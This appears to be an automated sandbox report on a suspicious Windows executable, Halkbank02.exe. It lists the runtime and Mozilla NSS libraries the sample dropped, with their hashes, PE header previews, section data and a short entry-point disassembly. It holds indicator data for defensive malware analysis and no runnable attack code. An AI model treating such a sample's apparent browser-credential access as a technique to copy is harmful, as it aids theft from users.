                                                                              Entropy (8bit):7.076072254895036
                                                                              Encrypted:false
                                                                              SSDEEP:192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
                                                                              MD5:8D02DD4C29BD490E672D271700511371
                                                                              SHA1:F3035A756E2E963764912C6B432E74615AE07011
                                                                              SHA-256:C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
                                                                              SHA-512:D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):22840
                                                                              Entropy (8bit):6.942029615075195
                                                                              Encrypted:false
                                                                              SSDEEP:384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
                                                                              MD5:41A348F9BEDC8681FB30FA78E45EDB24
                                                                              SHA1:66E76C0574A549F293323DD6F863A8A5B54F3F9B
                                                                              SHA-256:C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
                                                                              SHA-512:8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):24368
                                                                              Entropy (8bit):6.873960147000383
                                                                              Encrypted:false
                                                                              SSDEEP:384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
                                                                              MD5:FEFB98394CB9EF4368DA798DEAB00E21
                                                                              SHA1:316D86926B558C9F3F6133739C1A8477B9E60740
                                                                              SHA-256:B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
                                                                              SHA-512:57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):23488
                                                                              Entropy (8bit):6.840671293766487
                                                                              Encrypted:false
                                                                              SSDEEP:384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
                                                                              MD5:404604CD100A1E60DFDAF6ECF5BA14C0
                                                                              SHA1:58469835AB4B916927B3CABF54AEE4F380FF6748
                                                                              SHA-256:73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
                                                                              SHA-512:DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):20792
                                                                              Entropy (8bit):7.018061005886957
                                                                              Encrypted:false
                                                                              SSDEEP:384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
                                                                              MD5:849F2C3EBF1FCBA33D16153692D5810F
                                                                              SHA1:1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
                                                                              SHA-256:69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
                                                                              SHA-512:44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):18744
                                                                              Entropy (8bit):7.127951145819804
                                                                              Encrypted:false
                                                                              SSDEEP:192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
                                                                              MD5:B52A0CA52C9C207874639B62B6082242
                                                                              SHA1:6FB845D6A82102FF74BD35F42A2844D8C450413B
                                                                              SHA-256:A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
                                                                              SHA-512:18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...|.......................
                                                                              C:\Users\user\AppData\Local\Temp\2fda\freebl3.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):332752
                                                                              Entropy (8bit):6.8061257098244905
                                                                              Encrypted:false
                                                                              SSDEEP:6144:C+YBCxpjbRIDmvby5xDXlFVJM8PojGGHrIr1qqDL6XP+jW:Cu4Abg7XV72GI/qn6z
                                                                              MD5:343AA83574577727AABE537DCCFDEAFC
                                                                              SHA1:9CE3B9A182429C0DBA9821E2E72D3AB46F5D0A06
                                                                              SHA-256:393AE7F06FE6CD19EA6D57A93DD0ACD839EE39BA386CF1CA774C4C59A3BFEBD8
                                                                              SHA-512:827425D98BA491CD30929BEE6D658FCF537776CE96288180FE670FA6320C64177A7214FF4884AE3AA68E135070F28CA228AFB7F4012B724014BA7D106B5F0DCE
                                                                              Malicious:false
                                                                              Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L......Z.........."!.........f...............................................p......o.....@.............................P...`........@..p....................P..........T...........................8...@...............8............................text...U........................... ..`.rdata..............................@..@.data...lH..........................@....rsrc...p....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\2fda\mozglue.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):139216
                                                                              Entropy (8bit):6.841477908153926
                                                                              Encrypted:false
                                                                              SSDEEP:3072:8Oqe98Ea4usvd5jm6V0InXx/CHzGYC6NccMmxK3atIYHD2JJJsPyimY4kQkE:Vqe98Evua5Sm0ux/5YC6NccMmtXHD2JR
                                                                              MD5:9E682F1EB98A9D41468FC3E50F907635
                                                                              SHA1:85E0CECA36F657DDF6547AA0744F0855A27527EE
                                                                              SHA-256:830533BB569594EC2F7C07896B90225006B90A9AF108F49D6FB6BEBD02428B2D
                                                                              SHA-512:230230722D61AC1089FABF3F2DECFA04F9296498F8E2A2A49B1527797DCA67B5A11AB8656F04087ACADF873FA8976400D57C77C404EBA4AFF89D92B9986F32ED
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."yQ.f.?Mf.?Mf.?Mo`.Mv.?M.z>Lb.?M...Md.?M.z<Lh.?M.z;Lm.?M.z:Lu.?MDx>Lo.?Mf.>M..?M.{1Lu.?M.{?Lg.?M.{.Mg.?M.{=Lg.?MRichf.?M................PE..L......Z.........."!.........................................................@............@.............................\...L...,.... ..p....................0......p...T...............................@...................T...@....................text............................... ..`.rdata...b.......d..................@..@.data...............................@....rsrc...p.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\2fda\msvcp140.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):440120
                                                                              Entropy (8bit):6.652844702578311
                                                                              Encrypted:false
                                                                              SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                                                              MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                                                              SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                                                              SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                                                              SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\2fda\nss3.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1244112
                                                                              Entropy (8bit):6.809431682312062
                                                                              Encrypted:false
                                                                              SSDEEP:24576:XDI7I4/FeoJQuQ3IhXtHfjyqgJ0BnPQAib7/12bg2JSna5xfg0867U4MSpu731hn:uQ3YX5jyqgynPkbd24VwMSpu7Fhn
                                                                              MD5:556EA09421A0F74D31C4C0A89A70DC23
                                                                              SHA1:F739BA9B548EE64B13EB434A3130406D23F836E3
                                                                              SHA-256:F0E6210D4A0D48C7908D8D1C270449C91EB4523E312A61256833BFEAF699ABFB
                                                                              SHA-512:2481FC80DFFA8922569552C3C3EBAEF8D0341B80427447A14B291EC39EA62AB9C05A75E85EEF5EA7F857488CAB1463C18586F9B076E2958C5A314E459045EDE2
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........x..c+..c+..c+...+..c++.b*..c+lh.+..c++.`*..c++.f*..c++.g*..c+.b*..c+9.b*..c+..b+..c+9.k*..c+9.g*C.c+9.c*..c+9..+..c+9.a*..c+Rich..c+................PE..L...a..Z.........."!................T........................................@............@.............................d....<..T.......h.......................t~..0...T...............................@............................................text............................... ..`.rdata...P.......R..................@..@.data....E...`... ...:..............@....rsrc...h............Z..............@..@.reloc..t~...........^..............@..B................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\2fda\nssdbm3.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):92624
                                                                              Entropy (8bit):6.639368309935547
                                                                              Encrypted:false
                                                                              SSDEEP:1536:5vNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41ZH:hNGVOiBZbcGmxXMcBqmzoCUZoZebHZMw
                                                                              MD5:569A7A65658A46F9412BDFA04F86E2B2
                                                                              SHA1:44CC0038E891AE73C43B61A71A46C97F98B1030D
                                                                              SHA-256:541A293C450E609810279F121A5E9DFA4E924D52E8B0C6C543512B5026EFE7EC
                                                                              SHA-512:C027B9D06C627026774195D3EAB72BD245EBBF5521CB769A4205E989B07CB4687993A47061FF6343E6EC1C059C3EC19664B52ED3A1100E6A78CFFB1C46472AFB
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L......Z.........."!.........0...............0............................................@..........................?.......@.......`..p............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..4....0... ..................@..@.data........P.......>..............@....rsrc...p....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\2fda\softokn3.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):144336
                                                                              Entropy (8bit):6.5527585854849395
                                                                              Encrypted:false
                                                                              SSDEEP:3072:zAf6suip+z7FEk/oJz69sFaXeu9CoT2nIZvetBWqIBoE9Mv:Q6PpsF4CoT2EeY2eMv
                                                                              MD5:67827DB2380B5848166A411BAE9F0632
                                                                              SHA1:F68F1096C5A3F7B90824AA0F7B9DA372228363FF
                                                                              SHA-256:9A7F11C212D61856DFC494DE111911B7A6D9D5E9795B0B70BBBC998896F068AE
                                                                              SHA-512:910E15FD39B48CD13427526FDB702135A7164E1748A7EACCD6716BCB64B978FE333AC26FA8EBA73ED33BD32F2330D5C343FCD3F0FE2FFD7DF54DB89052DB7148
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L......Z.........."!.........`...............................................P......+Z....@..........................................0..p....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...C.......D..................@..@.data........ ......................@....rsrc...p....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\2fda\ucrtbase.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1142072
                                                                              Entropy (8bit):6.809041027525523
                                                                              Encrypted:false
                                                                              SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
                                                                              MD5:D6326267AE77655F312D2287903DB4D3
                                                                              SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
                                                                              SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
                                                                              SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\2fda\vcruntime140.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):83784
                                                                              Entropy (8bit):6.890347360270656
                                                                              Encrypted:false
                                                                              SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                                                              MD5:7587BF9CB4147022CD5681B015183046
                                                                              SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                                                              SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                                                              SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):5.903422169790693
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:Halkbank02.exe
                                                                              File size:114688
                                                                              MD5:a4cb6740c9195c5579acef4f7c8e40c7
                                                                              SHA1:54abe0f828d828d5ff840b989fb5f010395961f6
                                                                              SHA256:f1b1abf0182c865a3521d659cbc4bd86a4b00b0e4be95468a1d3b5ff46a3efc8
                                                                              SHA512:454837e72cab7fb74b1997a9cb65f00f4f61f2c20df207af2bc68bb14b64b05bc335b7a5ee453872f39b0e4d2608d1c430355411784e810c631c2a48913e3de8
                                                                              SSDEEP:1536:eCTH2yl2XRexuS7oM7AS9GvCxrJodHrRdgGpVBPy6mgjd+:e62dAwSsO9GvCxrJ6HbrVBPy6jU
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.......0...~...0.......0...Rich1...........PE..L...{ewV.................`...P...............p....@.............B..

                                                                              File Icon

                                                                              Icon Hash:20047c7c70f0e004

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x401500
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                              DLL Characteristics:
                                                                              Time Stamp:0x5677657B [Mon Dec 21 02:35:39 2015 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:4907098a5ecd4cf1549046838d3d7c44

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              push 0041003Ch
                                                                              call 00007FC3FC9F7C33h
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              xor byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              inc eax
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add dh, bl
                                                                              adc cl, bl
                                                                              inc ebp
                                                                              shr byte ptr [ecx-7261B6D1h], cl
                                                                              cdq
                                                                              push B02314D6h
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add dword ptr [eax], eax
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              cmp byte ptr [ecx-3Ah], bl
                                                                              add ch, byte ptr [ebp+69h]
                                                                              outsb
                                                                              insb
                                                                              insb
                                                                              jnc 00007FC3FC9F7CB3h
                                                                              add byte ptr [ecx+00h], al
                                                                              and byte ptr [eax], cl
                                                                              inc ecx
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add bh, bh
                                                                              int3
                                                                              xor dword ptr [eax], eax
                                                                              inc ebp
                                                                              or word ptr [edx], cx
                                                                              dec esp
                                                                              xor ah, byte ptr [edi]
                                                                              dec eax
                                                                              xchg byte ptr [ebx-5F3E302Eh], al
                                                                              jne 00007FC3FC9F7BEBh
                                                                              lodsd
                                                                              test al, D1h
                                                                              inc edx
                                                                              int1
                                                                              out dx, eax
                                                                              pop edx
                                                                              inc eax
                                                                              movsd
                                                                              sar cl, cl
                                                                              and eax, 3A648554h
                                                                              dec edi
                                                                              lodsd
                                                                              xor ebx, dword ptr [ecx-48EE309Ah]
                                                                              or al, 00h
                                                                              stosb
                                                                              add byte ptr [eax-2Dh], ah
                                                                              xchg eax, ebx
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              cmp dl, ch
                                                                              add byte ptr [eax], al
                                                                              inc eax
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              or byte ptr [eax], al
                                                                              inc edi
                                                                              jne 00007FC3FC9F7CB5h
                                                                              je 00007FC3FC9F7CA3h
                                                                              jc 00007FC3FC9F7CA6h
                                                                              push 00000000h
                                                                              or eax, 6B000501h
                                                                              outsd
                                                                              insd
                                                                              insd
                                                                              jne 00007FC3FC9F7C42h

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x168b40x28.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x180000x31be.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x10000x158.text
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x15dc40x16000False0.537486683239data6.51159061582IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                              .data0x170000xa340x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0x180000x31be0x4000False0.143920898438data2.81606437364IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountry
                                                                              CUSTOM0x1ac400x57eMS Windows icon resource - 1 icon, 16x16, 8 bits/pixelEnglishUnited States
                                                                              CUSTOM0x1a6c20x57eMS Windows icon resource - 1 icon, 16x16, 8 bits/pixelEnglishUnited States
                                                                              CUSTOM0x1a1440x57eMS Windows icon resource - 1 icon, 16x16, 8 bits/pixelEnglishUnited States
                                                                              CUSTOM0x19bc60x57eMS Windows icon resource - 1 icon, 16x16, 8 bits/pixelEnglishUnited States
                                                                              CUSTOM0x196480x57eMS Windows icon resource - 1 icon, 16x16, 8 bits/pixelEnglishUnited States
                                                                              CUSTOM0x190ca0x57eMS Windows icon resource - 1 icon, 16x16, 8 bits/pixelEnglishUnited States
                                                                              CUSTOM0x18b4c0x57eMS Windows icon resource - 1 icon, 16x16, 8 bits/pixelEnglishUnited States
                                                                              RT_ICON0x18a1c0x130data
                                                                              RT_ICON0x187340x2e8data
                                                                              RT_ICON0x1860c0x128GLS_BINARY_LSB_FIRST
                                                                              RT_GROUP_ICON0x185dc0x30data
                                                                              RT_VERSION0x182c00x31cdataChineseTaiwan

                                                                              Imports

                                                                              DLLImport
